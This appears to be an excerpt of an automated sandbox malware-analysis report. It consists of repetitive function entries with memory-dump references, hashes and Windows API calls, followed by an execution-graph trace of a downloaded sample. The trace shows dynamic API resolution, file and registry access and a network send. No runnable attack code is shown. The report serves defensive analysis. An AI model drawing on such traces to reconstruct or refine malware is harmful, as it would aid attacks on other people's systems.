                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 82885b3f2d2c0c26abc7d4b11b0b3c7dad406af6f34f46c70679e873b0e38f35
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 82885b3f2d2c0c26abc7d4b11b0b3c7dad406af6f34f46c70679e873b0e38f35
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 0030549F Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: f9b1612e69f87eb3b32eea29af2b905fc80ba58d0fd43d81eb82a54c757eaeae
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: f9b1612e69f87eb3b32eea29af2b905fc80ba58d0fd43d81eb82a54c757eaeae
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 00305544 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 802dbac17767bd83de1d760cde2a07caffcf15c4a2ed60162f51b1aab33f3f2c
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 802dbac17767bd83de1d760cde2a07caffcf15c4a2ed60162f51b1aab33f3f2c
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 003055C5 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 0dc373947f521b837ebf4bc373a9813f3182b6fa622ddd006a9d00c22c666e39
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 0dc373947f521b837ebf4bc373a9813f3182b6fa622ddd006a9d00c22c666e39
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 00305630 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 6f155199e27667ea6ce5ce229ebafcc599eb721eebecffb679dca679329860cf
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 6f155199e27667ea6ce5ce229ebafcc599eb721eebecffb679dca679329860cf
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 00305611 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: e52f097e9c6c91e5c57b49be0e2d0222302ba24d8b267b1b55611f9290324b7e
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: e52f097e9c6c91e5c57b49be0e2d0222302ba24d8b267b1b55611f9290324b7e
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 00305673 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 1198e461341a6d004b3772bdb9dfda75934e4557e98349a40252631d07f6e1b5
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 1198e461341a6d004b3772bdb9dfda75934e4557e98349a40252631d07f6e1b5
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 0030564C Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 7903b689b989dfe1fd6969a43f921954cf9d137cd31bb84e0df7044e1fcc20c1
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 7903b689b989dfe1fd6969a43f921954cf9d137cd31bb84e0df7044e1fcc20c1
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.5%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:1841
                                                                                                            Total number of Limit Nodes:60
                                                                                                            execution_graph 18076 e18ce3 18077 e18cf3 18076->18077 18078 e18df1 LoadLibraryW 18077->18078 18079 e18d8c GetProcAddress 18077->18079 18082 e18d0f 18077->18082 18081 e18d83 18078->18081 18083 e18e12 18078->18083 18080 e18d8a 18079->18080 18091 e18de5 18079->18091 18080->18078 18084 e18d3c GetProcAddressForCaller 18082->18084 18085 e18e41 18083->18085 18086 e18f27 LoadLibraryW 18083->18086 18084->18080 18084->18081 18087 e18ec5 GetProcAddress 18085->18087 18088 e18e4b 18085->18088 18086->18081 18089 e18f48 18086->18089 18090 e18f22 18087->18090 18087->18091 18092 e18e78 GetProcAddress 18088->18092 18093 e18f77 18089->18093 18094 e1905d LoadLibraryW 18089->18094 18090->18086 18091->18081 18092->18091 18095 e18ec3 18092->18095 18097 e18f81 18093->18097 18098 e18ffb GetProcAddress 18093->18098 18094->18081 18096 e1907e 18094->18096 18095->18090 18100 e19193 LoadLibraryExW 18096->18100 18101 e190ad 18096->18101 18102 e18fae GetProcAddress 18097->18102 18098->18091 18099 e19058 18098->18099 18099->18094 18100->18081 18103 e191ba 18100->18103 18104 e19131 GetProcAddress 18101->18104 18105 e190b7 18101->18105 18102->18091 18106 e18ff9 18102->18106 18108 e192d5 LoadLibraryW 18103->18108 18109 e191e9 18103->18109 18104->18091 18107 e1918e 18104->18107 18110 e190e4 GetProcAddress 18105->18110 18106->18099 18107->18100 18108->18081 18111 e192f6 18108->18111 18112 e19270 GetProcAddress 18109->18112 18113 e191f3 18109->18113 18110->18091 18114 e1912f 18110->18114 18117 e19325 18111->18117 18118 e1940b LoadLibraryW 18111->18118 18112->18091 18115 e192d0 18112->18115 18116 e19220 GetProcAddress 18113->18116 18114->18107 18115->18108 18116->18091 18119 e1926e 18116->18119 18120 e193a9 GetProcAddress 18117->18120 18121 e1932f 18117->18121 18118->18081 18122 e19432 18118->18122 18119->18115 18120->18091 18123 e19406 18120->18123 18126 e1935c GetProcAddress 18121->18126 18124 e19461 18122->18124 18125 e1954d LoadLibraryExW 18122->18125 18123->18118 18127 e194e8 GetProcAddress 18124->18127 18128 e1946b 18124->18128 18125->18081 18130 e1956e 18125->18130 18126->18091 18129 e193a7 18126->18129 18127->18091 18131 e19548 18127->18131 18134 e19498 GetProcAddress 18128->18134 18129->18123 18132 e19683 LoadLibraryExW 18130->18132 18133 e1959d 18130->18133 18131->18125 18132->18081 18137 e196aa 18132->18137 18135 e19621 GetProcAddress 18133->18135 18136 e195a7 18133->18136 18134->18091 18138 e194e6 18134->18138 18135->18091 18139 e1967e 18135->18139 18142 e195d4 GetProcAddress 18136->18142 18140 e197c5 LoadLibraryExW 18137->18140 18141 e196d9 18137->18141 18138->18131 18139->18132 18140->18081 18145 e197e6 18140->18145 18143 e19760 GetProcAddress 18141->18143 18144 e196e3 18141->18144 18142->18091 18146 e1961f 18142->18146 18143->18091 18147 e197c0 18143->18147 18148 e19710 GetProcAddress 18144->18148 18149 e19815 18145->18149 18150 e198fb LoadLibraryExW 18145->18150 18146->18139 18147->18140 18148->18091 18152 e1975e 18148->18152 18153 e19899 GetProcAddress 18149->18153 18154 e1981f 18149->18154 18150->18081 18151 e1991c 18150->18151 18157 e19a31 LoadLibraryExW 18151->18157 18160 e19955 18151->18160 18161 e199cf GetProcAddress 18151->18161 18152->18147 18153->18091 18155 e198f6 18153->18155 18156 e1984c GetProcAddress 18154->18156 18155->18150 18156->18091 18158 e19897 18156->18158 18157->18081 18159 e19a52 18157->18159 18158->18155 18164 e19a81 18159->18164 18165 e19b67 LoadLibraryExW 18159->18165 18163 e19982 GetProcAddressForCaller 18160->18163 18161->18091 18162 e199cd 18161->18162 18162->18157 18163->18081 18163->18162 18166 e19b05 GetProcAddress 18164->18166 18167 e19a8b 18164->18167 18165->18081 18172 e19b88 18165->18172 18166->18091 18168 e19b62 18166->18168 18169 e19ab8 GetProcAddress 18167->18169 18168->18165 18169->18091 18170 e19b03 18169->18170 18170->18168 18171 e19c38 GetProcAddress 18171->18091 18171->18172 18172->18081 18174 e19bb7 18172->18174 18173 e19bee GetProcAddress 18173->18091 18173->18174 18174->18171 18174->18172 18174->18173 20439 e234e0 20442 e23510 20439->20442 20440 e2353b 20441 e24620 5 API calls 20441->20442 20442->20440 20442->20441 20444 e233b0 send 20442->20444 20444->20442 17208 e17af0 17209 e17b16 17208->17209 17220 e17b30 17208->17220 17210 e17b34 17209->17210 17211 e17b1d 17209->17211 17223 e0fba0 17210->17223 17212 e17b40 17211->17212 17213 e17b24 17211->17213 17218 e0fba0 114 API calls 17212->17218 17215 e17b4c 17213->17215 17216 e17b2e DefWindowProcW 17213->17216 17215->17220 17221 e17b54 17215->17221 17216->17220 17217 e17b39 17217->17220 17218->17217 17222 e0fba0 114 API calls 17221->17222 17222->17217 17248 e0f510 17223->17248 17226 e0fbd1 CreateDirectoryW 17228 e0fbe3 GetLastError 17226->17228 17229 e0fbf4 LocalAlloc 17226->17229 17227 e0fd7d 17227->17217 17228->17229 17230 e0fd6a 17228->17230 17229->17230 17231 e0fc15 17229->17231 17230->17227 17233 e0fd72 LocalFree 17230->17233 17257 e28378 17231->17257 17233->17227 17235 e0fc8b 17236 e0fd57 17235->17236 17237 e0fc9d 17235->17237 17270 e08f40 17235->17270 17236->17230 17238 e0fd5f LocalFree 17236->17238 17239 e0fd11 LocalFree LocalFree 17237->17239 17238->17230 17239->17227 17242 e0fcd0 WriteFile 17246 e0fcfd CloseHandle 17242->17246 17247 e0fd2e LocalFree 17242->17247 17243 e0fd39 17244 e0fd41 CloseHandle 17243->17244 17245 e0fd4c DeleteFileW 17243->17245 17244->17245 17245->17236 17246->17239 17247->17243 17277 e0f410 17248->17277 17251 e0f595 lstrlenW lstrlenW LocalAlloc 17253 e0f642 CoTaskMemFree 17251->17253 17254 e0f5ef 17251->17254 17252 e0f64d 17252->17226 17252->17227 17253->17252 17255 e28378 89 API calls 17254->17255 17256 e0f61b lstrlenW CoTaskMemFree 17255->17256 17256->17252 17261 e283aa _snprintf 17257->17261 17258 e283af 17279 e2a940 17258->17279 17260 e283d1 17285 e29bec 17260->17285 17261->17258 17261->17260 17264 e0fc3c CreateFileW GetLastError 17264->17235 17267 e28417 17267->17264 17269 e29934 write_char 82 API calls 17267->17269 17269->17264 17271 e28378 89 API calls 17270->17271 17272 e08f78 RegGetValueW 17271->17272 17273 e08fd6 LocalAlloc 17272->17273 17274 e0903e 17272->17274 17273->17274 17275 e08ff4 RegGetValueW 17273->17275 17274->17242 17274->17243 17275->17274 17276 e09053 LocalFree 17275->17276 17276->17274 17278 e0f426 SHGetKnownFolderPath 17277->17278 17278->17251 17278->17252 17328 e2abe4 GetLastError FlsGetValue 17279->17328 17281 e283b4 17282 e2a8d8 17281->17282 17580 e2a868 DecodePointer 17282->17580 17284 e2a8f1 17284->17264 17587 e293ec 17285->17587 17288 e2a940 _errno 62 API calls 17303 e29c60 _snprintf _cftoe_l 17288->17303 17289 e29c6c 17290 e2a940 _errno 62 API calls 17289->17290 17291 e29c71 17290->17291 17292 e2a8d8 _invalid_parameter_noinfo 17 API calls 17291->17292 17293 e29c7c 17292->17293 17294 e2c4b0 _fltout2 8 API calls 17293->17294 17295 e2840b 17294->17295 17295->17264 17295->17267 17307 e29934 17295->17307 17296 e2a215 DecodePointer 17296->17303 17297 e30740 64 API calls 17297->17303 17298 e2c4d0 free 62 API calls 17298->17303 17299 e3059c __setargv 62 API calls 17299->17303 17300 e29afc 84 API calls write_multi_char 17300->17303 17301 e29b50 84 API calls 17301->17303 17302 e2a26d DecodePointer 17302->17303 17303->17289 17303->17293 17303->17296 17303->17297 17303->17298 17303->17299 17303->17300 17303->17301 17303->17302 17304 e2a292 DecodePointer 17303->17304 17306 e29ac4 84 API calls write_char 17303->17306 17595 e308c0 17303->17595 17304->17303 17306->17303 17876 e3033c 17307->17876 17310 e29961 17313 e2a940 _errno 62 API calls 17310->17313 17311 e29978 17312 e2997d 17311->17312 17323 e2998a write_char 17311->17323 17314 e2a940 _errno 62 API calls 17312->17314 17322 e29966 17313->17322 17314->17322 17315 e299ef 17316 e29a89 17315->17316 17317 e299fc 17315->17317 17318 e2ff94 _flush 82 API calls 17316->17318 17319 e29a18 17317->17319 17324 e29a31 17317->17324 17318->17322 17893 e2ff94 17319->17893 17322->17267 17323->17315 17323->17322 17325 e299e3 17323->17325 17882 e300c8 17323->17882 17324->17322 17917 e2f750 17324->17917 17325->17315 17890 e30074 17325->17890 17329 e2ac52 SetLastError 17328->17329 17330 e2ac0a 17328->17330 17329->17281 17340 e3061c 17330->17340 17333 e2ac1f FlsSetValue 17334 e2ac35 17333->17334 17335 e2ac4b 17333->17335 17345 e2ab2c 17334->17345 17354 e2c4d0 17335->17354 17339 e2ac50 17339->17329 17342 e30641 17340->17342 17343 e2ac17 17342->17343 17344 e3065f Sleep 17342->17344 17360 e32cbc 17342->17360 17343->17329 17343->17333 17344->17342 17344->17343 17370 e30b64 17345->17370 17355 e2c4d5 RtlFreeHeap 17354->17355 17359 e2c505 realloc 17354->17359 17356 e2c4f0 17355->17356 17355->17359 17357 e2a940 _errno 60 API calls 17356->17357 17358 e2c4f5 GetLastError 17357->17358 17358->17359 17359->17339 17361 e32cd1 17360->17361 17365 e32cee 17360->17365 17362 e32cdf 17361->17362 17361->17365 17363 e2a940 _errno 61 API calls 17362->17363 17366 e32ce4 17363->17366 17364 e32d06 HeapAlloc 17364->17365 17364->17366 17365->17364 17365->17366 17368 e2c738 DecodePointer 17365->17368 17366->17342 17369 e2c753 17368->17369 17369->17365 17371 e30b93 EnterCriticalSection 17370->17371 17372 e30b82 17370->17372 17376 e30a7c 17372->17376 17377 e30aa3 17376->17377 17378 e30aba 17376->17378 17408 e2eaec 17377->17408 17390 e30acf 17378->17390 17457 e3059c 17378->17457 17384 e30ae5 17387 e2a940 _errno 60 API calls 17384->17387 17385 e30af4 17388 e30b64 _lock 60 API calls 17385->17388 17387->17390 17391 e30afe 17388->17391 17390->17371 17401 e2e838 17390->17401 17392 e30b37 17391->17392 17393 e30b0a InitializeCriticalSectionAndSpinCount 17391->17393 17394 e2c4d0 free 60 API calls 17392->17394 17395 e30b26 LeaveCriticalSection 17393->17395 17396 e30b19 17393->17396 17394->17395 17395->17390 17398 e2c4d0 free 60 API calls 17396->17398 17399 e30b21 17398->17399 17400 e2a940 _errno 60 API calls 17399->17400 17400->17395 17402 e2eaec _FF_MSGBANNER 62 API calls 17401->17402 17403 e2e845 17402->17403 17404 e2e88c _amsg_exit 62 API calls 17403->17404 17405 e2e84c 17404->17405 17558 e2e670 17405->17558 17462 e32598 17408->17462 17411 e2eb09 17413 e2e88c _amsg_exit 62 API calls 17411->17413 17415 e2eb2a 17411->17415 17412 e32598 _set_error_mode 62 API calls 17412->17411 17414 e2eb20 17413->17414 17416 e2e88c _amsg_exit 62 API calls 17414->17416 17417 e2e88c 17415->17417 17416->17415 17418 e2e8c0 _amsg_exit 17417->17418 17419 e32598 _set_error_mode 59 API calls 17418->17419 17453 e2ea12 17418->17453 17421 e2e8d6 17419->17421 17423 e2ea54 GetStdHandle 17421->17423 17424 e32598 _set_error_mode 59 API calls 17421->17424 17422 e2eacc 17454 e2e4dc 17422->17454 17426 e2ea67 _cftoe_l 17423->17426 17423->17453 17425 e2e8e7 17424->17425 17425->17423 17425->17453 17468 e3252c 17425->17468 17428 e2eaa1 WriteFile 17426->17428 17426->17453 17428->17453 17430 e2e92d GetModuleFileNameW 17431 e2e953 17430->17431 17437 e2e97c _amsg_exit 17430->17437 17433 e3252c _amsg_exit 59 API calls 17431->17433 17432 e2a834 _fltout2 16 API calls 17434 e2ea53 17432->17434 17435 e2e964 17433->17435 17434->17423 17435->17437 17477 e2a834 17435->17477 17452 e2e9d4 17437->17452 17480 e3245c 17437->17480 17440 e2ea2b 17444 e2a834 _fltout2 16 API calls 17440->17444 17442 e323d4 _amsg_exit 59 API calls 17445 e2e9f9 17442->17445 17446 e2ea40 17444->17446 17447 e2ea17 17445->17447 17448 e2e9fd 17445->17448 